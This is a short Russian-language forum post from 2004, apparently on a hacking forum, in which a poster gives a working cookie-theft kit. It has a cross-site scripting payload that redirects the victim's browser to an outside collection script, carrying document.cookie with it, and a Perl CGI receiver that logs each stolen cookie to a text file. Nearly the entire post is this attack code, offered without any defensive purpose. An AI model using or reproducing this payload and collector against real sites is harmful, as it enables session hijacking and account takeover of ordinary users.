
09.10.2004, 04:42
|
|
Новичок
Регистрация: 09.10.2004
Сообщений: 4
Провел на форуме: 0
Репутация:
0
|
|
А если по-думать головой?
<script>document.location.href=' http://target.com/cgi-bin/cookie.cgi?' + document.cookie;</script>
(cookie.cgi)
#!/usr/bin/perl -w
open COOKIES,">>../cookies.txt";
print "Content-Type: text/html\n\n";
print COOKIES "----------- new cookie -----------\n";
print COOKIES "$ENV{'QUERY_STRING'}\n";
print COOKIES "---------- end of cookie ---------\n\n";
close COOKIES;

|
|
|